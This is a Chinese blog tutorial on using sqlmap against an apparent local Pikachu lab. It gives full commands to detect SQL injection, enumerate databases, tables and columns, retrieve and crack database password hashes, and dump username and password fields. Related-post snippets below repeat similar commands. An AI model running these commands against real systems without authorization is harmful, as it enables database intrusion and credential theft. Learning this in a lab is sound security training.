SQLMAP使用教程(二)实战技巧一

已于 2022-07-21 21:51:07 修改
阅读量1.1k 收藏 7
点赞数 2
分类专栏: 安全工具 文章标签: mysql php 数据库 web安全
于 2022-07-04 23:19:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51730169/article/details/125609691
版权

一、检测注入

检测URL GET参数的是否存在注入:

-u 检测的url
""双引号,表示这是一段字符串。
--dbms 指定攻击的数据引擎
-v 输出信息登记为1

sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1

输入之后sqlmap会自动进行注入,但会有一些进行提示,需要你在终端进行确认,如果使用--batch 会自动进行默认操作,不用进行交互
信息确定。
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 --batch

在这里插入图片描述

二、获取敏感信息

确定存在注入之后,接着通过获取敏感信息命令获取

--current-user 用户连接的用户;
--currnet-db 当前库;
--dbs 获取所有库;
--is-dba 是否root权限;
--passwords 获取数据库的密码。
使用这个命令 sqlmap找到密文时,会提示你是否进行hash破解,如果需要选择合适的字典。

eg:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql --current-user --current-db --is-dba --passwords -v 1 --batch

在这里插入图片描述在这里插入图片描述

三、获取表

在获取当前库,可以根据库列出表。

-D 指定库;
--tables 列出所有表。

sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu --tables

在这里插入图片描述在这里插入图片描述

四、获取表的字段

获取某个表的所有字段。

-T 指定某个表;
--columns 获取字段。

sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns

在这里插入图片描述在这里插入图片描述

五、获取数据

--dump 是导出数据所有内容;
--dump -C "username,password" 获取字段的内容;

获取指定表的所有字段内容:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns --dump

在这里插入图片描述在这里插入图片描述

获取指定表、指定字段内容。
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users -C "id,username,password" --dump

在这里插入图片描述在这里插入图片描述

六、获取指定条数

获取总条数:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --count

在这里插入图片描述在这里插入图片描述

获取指定id条数:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --dump --start 2 --stop 3

在这里插入图片描述在这里插入图片描述

七、删除缓存文件

参数:--flush-session
如果不想用之前缓存这个目标的session文件,可以使用这个参数。 会清空之前的session,重新测试该目标。
Aτθ
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP系列课程
04-27
SQLMAP系列课程是针对网络安全领域中的一个强大工具——SQLMAP进行深入学习的教程。SQLMAP是一款自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试人员在目标系统中发现和利用...
SQL注入实战详解
03-30
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入数据的漏洞。当攻击者成功执行SQL注入时,他们可以控制...这些视频教程将帮助你更好地理解这一关键的网络安全问题,并提供实用的应对技巧
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4694
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
SQLMAP与SQL注入实战演练 赠送靶场
01-24
课程涵盖:1. SQLMAP基础使用,带你由浅入深掌握技能。2. 5种注入模式的详解,进一步了解实操手法。3. 高级进阶技巧,让你突破更多的瓶颈。4.还提供多达 80关 的独家授权靶场!学以致用,方能成器!理论+实战的教学模式,让你真正的做到边学边练,即学即用!本次福利课程仅需12元!
SQLmap常用命令 使用教程_sqlmap总是自动确认(1)
最新发布
2401_84281638的博客
05-17 578
(User-agent/Referer/Cookie等HTTP Header),拦截get,post等HTTP请求,将所有请求内容复制到target.vm文件中,在需要检测的Header后面加上*,并且需要level>=3。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
sqlmap的应用实战
vala0901的博客
05-10 7203
小白一枚,在大神的各种帖子帮助下刚学会用sqlmap,写下过程一起分享
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
xnxqwzy的博客
09-06 1354
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
sqlMap的简单使用
weixin_54472394的博客
06-05 411
一、单个、多个 url 查询 1.单个 -u 1.多个 -m feixiang.txt: http.txt: 三 ,http bp日志扫描 使用bp抓包 保持访问过的 http头部文件 -l :log http log 的意思 –level 5 : cookie 等http头部文件查询
sqlmap学习(六)设置请求参数
rane的博客
03-26 755
1、sqlmap设置忽略401 --ignore-401参数用来忽略未验证错误 2、sqlmap设置HTTP协议私钥 当web服务器需要适当的客户端证书和用于身份验证的私钥时,使用此选项 --auth-file文件名 3、sqlmap设置安全模式 避免在多次请求失败后销毁会话 有时,如果执行了一定数量的不成功请求,则在此期间的web应用程序或检查技术会销毁会话。 有的web应用程序会在你多次访问错...
DVWA全级别中文渗透教程和渗透环境,最强大没有之一
11-26
通过实际操作DVWA,学习者可以锻炼自己的渗透测试技能,如使用Burp Suite等工具进行代理抓包、利用SQLMap进行自动化SQL注入等。同时,还能了解如何防御这些漏洞,提升网站的安全性。 8. **社区支持** DVWA拥有...
iBATIS-SqlMaps-中文教程
07-31
这篇教程通过详细的讲解和实例,帮助读者理解和掌握iBATIS的核心功能和使用技巧。 在本教程中,你将学习到: 1. **iBATIS框架概述**:了解iBATIS的历史、设计目标以及它在Java应用中的地位。iBATIS旨在提供一种...
SqlMap的使用
06-24
本文档详细介绍了SqlMap使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
安全工程师学习线路1
08-03
- **3周渗透工具熟练**:学习和实践AWVS、sqlmap、Burp等工具的使用,通过SecWiki获取教程和资源。 - **5周渗透实战**:观看渗透测试视频,搭建测试环境进行实战,研究不同类型的攻击,如SQL注入、文件上传等。 - **...
有关sqlmap的使用
Mike_Roger的博客
01-24 658
首先贴一段详细参数说明,相当于说明书了 sqlmap详细命令: -is-dba 当前用户权限(是否为root权限) -dbs 所有数据库 -current-db 网站当前数据库 -users 所有数据库用户 -current-user 当前数据库用户 -random-agent 构造随机user-agent -passwords 数据库密码
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
sqlmap简单命令
weixin_45498140的博客
08-11 320
sqlmap -u “存在注入的地址” --batch(batch-从不询问用户输入,使用所有默认配置。) sqlmap -u “存在注入的地址” --dbs --batch (dbs -枚举数据库管理系统数据库sqlmap -u “存在注入的地址” --batch -Dcaidian --tables(tables-枚举的DBMS数据库中的表) sqlmap -u “存在注入的地址” --batch -Dcaidian -T flag --columns(columns-枚举DBMS数据库表列)
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战
zzzfff__的博客
11-21 1771
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
SQL注入部分:DVWA+SQLmap+Mysql注入实战
AZXYZNPY的博客
11-21 675
(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。注意:应当在第一个页面就点检查,而不是点击检查源代码之后再点击检查,然后就能获得cookie值,而且每次实验的值都不一样,因此做实验最好一次做完。7、枚举指定数据表中的所有用户名与密码,并down到本地。--tables:枚举指定数据库的所有表。2、枚举当前使用的数据库名称和用户名。5、枚举数据库指定数据库的数据表。--dbs:枚举当前数据库。-T:指定数据库中的数据表。
SQLMap获取目标信息
分享与记录
03-20 2618
还未安装SQLMap的,可以看这里:https://blog.csdn.net/weixin_45254208/article/details/104697014 1.sqlmap连接数据库 服务型数据库MySQL,Oracle python sqlmap.py -d "mysql://用户名:密码@地址:端口/数据库名" -f --banner --dbs --users -f     ...
sqlmap 使用教程
09-23
sqlmap是一款用于自动化SQL注入的工具,它可以帮助安全测试人员识别和利用Web应用程序中的SQL注入漏洞。下面是sqlmap使用教程: 1. 扫描URL:使用以下命令扫描目标URL并确定是否存在SQL注入漏洞: sqlmap -u "http://example.com/page.php?id=1" 2. 指定数据库和表名:如果成功发现SQL注入漏洞,可以使用以下命令指定数据库和表名: sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name 3. 获取字段信息:要获取表的字段信息,可以使用以下命令: sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --columns 4. 获取数据:要获取表中的数据,可以使用以下命令: sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name -C column1,column2,... --dump 5. 获取当前数据库:如果只想获取当前所使用的数据库,可以使用以下命令: sqlmap -u "http://example.com/page.php?id=1" --current-db 请注意,以上命令只是sqlmap的一些基本用法。sqlmap还有许多其他功能和选项,你可以通过sqlmap的官方文档来深入了解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值